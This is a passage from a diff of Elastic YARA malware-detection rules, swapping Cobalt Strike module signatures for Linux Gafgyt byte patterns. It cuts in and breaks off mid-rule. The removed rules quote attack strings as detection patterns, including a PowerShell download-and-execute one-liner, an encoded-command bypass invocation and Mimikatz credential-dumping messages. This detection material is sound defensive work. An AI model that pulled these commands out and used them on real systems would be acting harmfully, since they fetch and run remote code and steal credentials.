"Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\interfaces.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\interfaces.x86.o" ascii fullword - $b1 = "__imp_BeaconFormatAlloc" ascii fullword - $b2 = "__imp_BeaconFormatPrintf" ascii fullword - $b3 = "__imp_BeaconOutput" ascii fullword - $b4 = "__imp_KERNEL32$LocalAlloc" ascii fullword - $b5 = "__imp_KERNEL32$LocalFree" ascii fullword - $b6 = "__imp_LoadLibraryA" ascii fullword - $c1 = "__imp__BeaconFormatAlloc" ascii fullword - $c2 = "__imp__BeaconFormatPrintf" ascii fullword - $c3 = "__imp__BeaconOutput" ascii fullword - $c4 = "__imp__KERNEL32$LocalAlloc" ascii fullword - $c5 = "__imp__KERNEL32$LocalFree" ascii fullword - $c6 = "__imp__LoadLibraryA" ascii fullword + $a = { 00 00 2C 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A } condition: - 1 of ($a*) or 4 of ($b*) or 4 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_09B79Efa : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_9E9530A7 : FILE MEMORY { meta: - description = "Identifies Invoke Assembly module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "09b79efa-55d7-481d-9ee0-74ac5f787cef" - date = "2021-03-23" - modified = "2021-08-23" + id = "9e9530a7-ad4d-4a44-b764-437b7621052f" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L203-L232" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "75fd003b9adf03aff8479b1b10da9c94955870b5fa4f1958f870e14acb2793c7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L178-L196" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" + logic_hash = "6a5a80e58c86a80f8954e678a2cc26b258d7d7c50047a3e71f3580f1780e3454" score = 75 - quality = 48 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "04ef6555e8668c56c528dc62184331a6562f47652c73de732e5f7c82779f2fd8" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "invokeassembly.x64.dll" ascii fullword - $a2 = "invokeassembly.dll" ascii fullword - $b1 = "[-] Failed to get default AppDomain w/hr 0x%08lx" ascii fullword - $b2 = "[-] Failed to load the assembly w/hr 0x%08lx" ascii fullword - $b3 = "[-] Failed to create the runtime host" ascii fullword - $b4 = "[-] Invoke_3 on EntryPoint failed." ascii fullword - $b5 = "[-] CLR failed to start w/hr 0x%08lx" ascii fullword - $b6 = "ReflectiveLoader" - $b7 = ".NET runtime [ver %S] cannot be loaded" ascii fullword - $b8 = "[-] No .NET runtime found. :(" ascii fullword - $b9 = "[-] ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx" ascii fullword - $c1 = { FF 57 0C 85 C0 78 40 8B 45 F8 8D 55 F4 8B 08 52 50 } + $a = { F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3 } condition: - 1 of ($a*) or 3 of ($b*) or 1 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_6E77233E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_5Bf62Ce4 : FILE MEMORY { meta: - description = "Identifies Kerberos module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "6e77233e-7fb4-4295-823d-f97786c5d9c4" - date = "2021-03-23" - modified = "2021-08-23" + id = "5bf62ce4-619b-4d46-b221-c5bf552474bb" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L234-L269" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "93aa11523b794402b257d02d4f9edc5ad320bfdb5b8b0f671ff08f399ef9e674" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L198-L216" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" + logic_hash = "848e0c796584cfa21afc182da5f417f5467ae84c74f52cabc13e0f5de4990232" score = 75 - quality = 63 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "cef2949eae78b1c321c2ec4010749a5ac0551d680bd5eb85493fc88c5227d285" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\kerberos.x64.o" ascii fullword - $a2 = "$unwind$command_kerberos_ticket_use" ascii fullword - $a3 = "$pdata$command_kerberos_ticket_use" ascii fullword - $a4 = "command_kerberos_ticket_use" ascii fullword - $a5 = "$pdata$command_kerberos_ticket_purge" ascii fullword - $a6 = "command_kerberos_ticket_purge" ascii fullword - $a7 = "$unwind$command_kerberos_ticket_purge" ascii fullword - $a8 = "$unwind$kerberos_init" ascii fullword - $a9 = "$unwind$KerberosTicketUse" ascii fullword - $a10 = "KerberosTicketUse" ascii fullword - $a11 = "$unwind$KerberosTicketPurge" ascii fullword - $b1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\kerberos.x86.o" ascii fullword - $b2 = "_command_kerberos_ticket_use" ascii fullword - $b3 = "_command_kerberos_ticket_purge" ascii fullword - $b4 = "_kerberos_init" ascii fullword - $b5 = "_KerberosTicketUse" ascii fullword - $b6 = "_KerberosTicketPurge" ascii fullword - $b7 = "_LsaCallKerberosPackage" ascii fullword + $a = { 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D } condition: - 5 of ($a*) or 3 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_De42495A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_F3D83A74 : FILE MEMORY { meta: - description = "Identifies Mimikatz module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "de42495a-0002-466e-98b9-19c9ebb9240e" - date = "2021-03-23" - modified = "2021-08-23" + id = "f3d83a74-2888-435a-9a3c-b7de25084e9a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L271-L301" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2a13c73d221d80d25a432f9e0a1387153a78f58719066586e9d80d17613293ef" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L218-L236" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" + logic_hash = "2db46180e66c9268a97d63cd1c4eb8439e6882b4e3277bc4848e940e4d25482f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dab3c25809ec3af70df5a8a04a2efd4e8ecb13a4c87001ea699e7a1512973b82" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "\\\\.\\pipe\\mimikatz" ascii fullword - $b1 = "ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Da" wide - $b2 = "ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" wide fullword - $b3 = "ERROR kuhl_m_lsadump_getUsersAndSamKey ; kuhl_m_lsadump_getSamKey KO" wide fullword - $b4 = "ERROR kuhl_m_lsadump_getComputerAndSyskey ; kull_m_registry_RegOpenKeyEx LSA KO" wide fullword - $b5 = "ERROR kuhl_m_lsadump_lsa_getHandle ; OpenProcess (0x%08x)" wide fullword - $b6 = "ERROR kuhl_m_lsadump_enumdomains_users ; SamLookupNamesInDomain: %08x" wide fullword - $b7 = "mimikatz(powershell) # %s" wide fullword - $b8 = "powershell_reflective_mimikatz" ascii fullword - $b9 = "mimikatz_dpapi_cache.ndr" wide fullword - $b10 = "mimikatz.log" wide fullword - $b11 = "ERROR mimikatz_doLocal" wide - $b12 = "mimikatz_x64.compressed" wide + $a = { DC 00 74 1B 83 7D E0 0A 75 15 83 7D E4 00 79 0F C7 45 C8 01 00 } condition: - 1 of ($a*) and 7 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_72F68375 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_807911A2 : FILE MEMORY { meta: - description = "Identifies Netdomain module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "72f68375-35ab-49cc-905d-15302389a236" - date = "2021-03-23" - modified = "2021-08-23" + id = "807911a2-f6ec-4e65-924f-61cb065dafc6" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L303-L328" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "912e37829a9f99e00326745343c9e4593cd7cfb8d4dfafc66027cddcb4d883be" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L238-L255" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "66b15304d5ed22daea666bd0e2b18726b8a058361ff8d69b974bfded933a4d8c" score = 75 - quality = 63 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ecc28f414b2c347722b681589da8529c6f3af0491845453874f8fd87c2ae86d7" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\net_domain.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\net_domain.x86.o" ascii fullword - $b1 = "__imp_BeaconPrintf" ascii fullword - $b2 = "__imp_NETAPI32$NetApiBufferFree" ascii fullword - $b3 = "__imp_NETAPI32$DsGetDcNameA" ascii fullword - $c1 = "__imp__BeaconPrintf" ascii fullword - $c2 = "__imp__NETAPI32$NetApiBufferFree" ascii fullword - $c3 = "__imp__NETAPI32$DsGetDcNameA" ascii fullword + $a = { FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D } condition: - 1 of ($a*) or 2 of ($b*) or 2 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_15F680Fb : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_9C18716C : FILE MEMORY { meta: - description = "Identifies Netview module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "15f680fb-a04f-472d-a182-0b9bee111351" - date = "2021-03-23" - modified = "2021-08-23" + id = "9c18716c-e5cd-4b4f-98e2-0daed77f34cd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L330-L360" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "0efe368ad82f5b0f6301121bfda9fd049b008ac246368bfa22bd976fa2c56b79" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L257-L274" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0e70dc82b2049a6f5efcc501e18e6f87e04a2d50efcb5143240c68c4a924de52" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0ecb8e41c01bf97d6dea4cf6456b769c6dd2a037b37d754f38580bcf561e1d2c" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "351772d2936ec1a14ee7e2f2b79a8fde62d02097ae6a5304c67e00ad1b11085a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "netview.x64.dll" ascii fullword - $a2 = "netview.dll" ascii fullword - $a3 = "\\\\.\\pipe\\netview" ascii fullword - $b1 = "Sessions for \\\\%s:" ascii fullword - $b2 = "Account information for %s on \\\\%s:" ascii fullword - $b3 = "Users for \\\\%s:" ascii fullword - $b4 = "Shares at \\\\%s:" ascii fullword - $b5 = "ReflectiveLoader" ascii fullword - $b6 = "Password changeable" ascii fullword - $b7 = "User's Comment" wide fullword - $b8 = "List of hosts for domain '%s':" ascii fullword - $b9 = "Password changeable" ascii fullword - $b10 = "Logged on users at \\\\%s:" ascii fullword + $a = { FC 80 F6 FE 59 21 EC 75 10 26 CF DC 7B 5A 5B 4D 24 C9 C0 F3 } condition: - 2 of ($a*) or 6 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_5B4383Ec : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Fbed4652 : FILE MEMORY { meta: - description = "Identifies Portscan module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "5b4383ec-3c93-4e91-850e-d43cc3a86710" - date = "2021-03-23" - modified = "2021-08-23" + id = "fbed4652-2c68-45c6-8116-e3fe7d0a28b8" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L362-L392" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "033bd831209958674f6309739d65c58d05acb9d17e53cede1cf171c6d6e84efa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L276-L294" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2ea21358205612f5dc0d5f417c498b236c070509531621650b8c215c98c49467" + logic_hash = "fc1f501123ab7421034e183186b077f65838b475f883d4ff04e8fc8a283424ef" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "283d3d2924e92b31f26ec4fc6b79c51bd652fb1377b6985b003f09f8c3dba66c" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "a08bcc7d0999562b4ef2d8e0bdcfa111fe0f76fc0d3b14d42c8e93b7b90abdca" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "portscan.x64.dll" ascii fullword - $a2 = "portscan.dll" ascii fullword - $a3 = "\\\\.\\pipe\\portscan" ascii fullword - $b1 = "(ICMP) Target '%s' is alive. [read %d bytes]" ascii fullword - $b2 = "(ARP) Target '%s' is alive. " ascii fullword - $b3 = "TARGETS!12345" ascii fullword - $b4 = "ReflectiveLoader" ascii fullword - $b5 = "%s:%d (platform: %d version: %d.%d name: %S domain: %S)" ascii fullword - $b6 = "Scanner module is complete" ascii fullword - $b7 = "pingpong" ascii fullword - $b8 = "PORTS!12345" ascii fullword - $b9 = "%s:%d (%s)" ascii fullword - $b10 = "PREFERENCES!12345" ascii fullword + $a = { 02 00 00 2B 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D } condition: - 2 of ($a*) or 6 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_91E08059 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_94A44Aa5 : FILE MEMORY { meta: - description = "Identifies Post Ex module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "91e08059-46a8-47d0-91c9-e86874951a4a" - date = "2021-03-23" - modified = "2021-08-23" + id = "94a44aa5-6c8b-40b9-8aac-d18cf4a76a19" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L394-L421" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d5a8c1a0baa5e915cff29bcac33e30a7d7260f938ecaa6171d3aa88425a69266" - score = 75 - quality = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L296-L314" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a7694202f9c32a9d73a571a30a9e4a431d5dfd7032a500084756ba9a48055dba" + logic_hash = "deb46c2960dc4868b7bac1255d8753895950bc066dec03674a714860ff72ef2c" + score = 60 + quality = 45 tags = "FILE, MEMORY" - fingerprint = "d8baacb58a3db00489827275ad6a2d007c018eaecbce469356b068d8a758634b" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "daf7e0382dd4a566eb5a4aac8c5d9defd208f332d8e327637d47b50b9ef271f9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "postex.x64.dll" ascii fullword - $a2 = "postex.dll" ascii fullword - $a3 = "RunAsAdminCMSTP" ascii fullword - $a4 = "KerberosTicketPurge" ascii fullword - $b1 = "GetSystem" ascii fullword - $b2 = "HelloWorld" ascii fullword - $b3 = "KerberosTicketUse" ascii fullword - $b4 = "SpawnAsAdmin" ascii fullword - $b5 = "RunAsAdmin" ascii fullword - $b6 = "NetDomain" ascii fullword + $a = { 00 00 00 83 F8 FF 0F 45 C2 48 8B 4C 24 08 64 48 33 0C 25 28 00 } condition: - 2 of ($a*) or 4 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_Ee756Db7 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_E0673A90 : FILE MEMORY { meta: - description = "Attempts to detect Cobalt Strike based on strings found in BEACON" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "ee756db7-e177-41f0-af99-c44646d334f7" - date = "2021-03-23" - modified = "2021-08-23" + id = "e0673a90-165e-4347-a965-e8d14fdf684b" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L423-L491" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8d594aa1b889e80000cfcedbfc470a1b768bdcc2a9c436cd449b495c91011918" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L316-L334" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6" + logic_hash = "149147eedd66f9ca2dad9cb69f37abc849d44331ec1b5d2917ab3867ced0b274" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a2 = "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a3 = "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset." ascii fullword - $a4 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" ascii fullword - $a5 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')" ascii fullword - $a6 = "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a7 = "could not run command (w/ token) because of its length of %d bytes!" ascii fullword - $a8 = "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a9 = "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a10 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" ascii fullword - $a11 = "Could not open service control manager on %s: %d" ascii fullword - $a12 = "%d is an x64 process (can't inject x86 content)" ascii fullword - $a13 = "%d is an x86 process (can't inject x64 content)" ascii fullword - $a14 = "Failed to impersonate logged on user %d (%u)" ascii fullword - $a15 = "could not create remote thread in %d: %d" ascii fullword - $a16 = "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a17 = "could not write to process memory: %d" ascii fullword - $a18 = "Could not create service %s on %s: %d" ascii fullword - $a19 = "Could not delete service %s on %s: %d" ascii fullword - $a20 = "Could not open process token: %d (%u)" ascii fullword - $a21 = "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a22 = "Could not start service %s on %s: %d" ascii fullword - $a23 = "Could not query service %s on %s: %d" ascii fullword - $a24 = "Could not connect to pipe (%s): %d" ascii fullword - $a25 = "%s.1%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a26 = "could not spawn %s (token): %d" ascii fullword - $a27 = "could not open process %d: %d" ascii fullword - $a28 = "could not run %s as %s\\%s: %d" ascii fullword - $a29 = "%s.1%08x%08x%08x%08x.%x%x.%s" ascii fullword - $a30 = "kerberos ticket use failed:" ascii fullword - $a31 = "Started service %s on %s" ascii fullword - $a32 = "%s.1%08x%08x%08x.%x%x.%s" ascii fullword - $a33 = "I'm already in SMB mode" ascii fullword - $a34 = "could not spawn %s: %d" ascii fullword - $a35 = "could not open %s: %d" ascii fullword - $a36 = "%s.1%08x%08x.%x%x.%s" ascii fullword - $a37 = "Could not open '%s'" ascii fullword - $a38 = "%s.1%08x.%x%x.%s" ascii fullword - $a39 = "%s as %s\\%s: %d" ascii fullword - $a40 = "%s.1%x.%x%x.%s" ascii fullword - $a41 = "beacon.x64.dll" ascii fullword - $a42 = "%s on %s: %d" ascii fullword - $a43 = "www6.%x%x.%s" ascii fullword - $a44 = "cdn.%x%x.%s" ascii fullword - $a45 = "api.%x%x.%s" ascii fullword - $a46 = "%s (admin)" ascii fullword - $a47 = "beacon.dll" ascii fullword - $a48 = "%s%s: %s" ascii fullword - $a49 = "@%d.%s" ascii fullword - $a50 = "%02d/%02d/%02d %02d:%02d:%02d" ascii fullword - $a51 = "Content-Length: %d" ascii fullword + $a = { 45 E8 0F B6 00 84 C0 74 17 48 8B 75 E8 48 FF C6 48 8B 7D F0 48 } condition: - 6 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_9C0D5561 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_821173Df : FILE MEMORY { meta: - description = "Identifies PowerShell Runner module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "9c0d5561-5b09-44ae-8e8c-336dee606199" - date = "2021-03-23" - modified = "2021-10-04" + id = "821173df-6835-41e1-a662-a432abf23431" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L493-L523" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "a8929266950e0f540a68c4fedf708e8ddc27f208f9f2866245ad7bb7f6d87913" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L336-L354" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "de7d1aff222c7d474e1a42b2368885ef16317e8da1ca3a63009bf06376026163" + logic_hash = "1c6c7666983c43176aa1a9628fb4352f8f11729e02dda13669ca2e62aed5f4ee" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "01d53fcdb320f0cd468a2521c3e96dcb0b9aa00e7a7a9442069773c6b3759059" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "c311789e1370227f7be1d87da0c370a905b7f5b4c55cdee0f0474060cc0fc5e4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "PowerShellRunner.dll" wide fullword - $a2 = "powershell.x64.dll" ascii fullword - $a3 = "powershell.dll" ascii fullword - $a4 = "\\\\.\\pipe\\powershell" ascii fullword - $b1 = "PowerShellRunner.PowerShellRunner" ascii fullword - $b2 = "Failed to invoke GetOutput w/hr 0x%08lx" ascii fullword - $b3 = "Failed to get default AppDomain w/hr 0x%08lx" ascii fullword - $b4 = "ICLRMetaHost::GetRuntime (v4.0.30319) failed w/hr 0x%08lx" ascii fullword - $b5 = "CustomPSHostUserInterface" ascii fullword - $b6 = "RuntimeClrHost::GetCurrentAppDomainId failed w/hr 0x%08lx" ascii fullword - $b7 = "ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx" ascii fullword - $c1 = { 8B 08 50 FF 51 08 8B 7C 24 1C 8D 4C 24 10 51 C7 } - $c2 = "z:\\devcenter\\aggressor\\external\\PowerShellRunner\\obj\\Release\\PowerShellRunner.pdb" ascii fullword + $a = { D0 48 FF C8 48 03 45 F8 48 FF C8 C6 00 00 48 8B 45 F8 48 C7 C1 FF FF } condition: - (1 of ($a*) and 4 of ($b*)) or 1 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_59Ed9124 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_31796A40 : FILE MEMORY { meta: - description = "Identifies PsExec module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "59ed9124-bc20-4ea6-b0a7-63ee3359e69c" - date = "2021-03-23" - modified = "2021-08-23" + id = "31796a40-1cbe-4d0c-a785-d16f40765f4a" + date = "2021-01-12" + modified = "2021-09-16" reference = 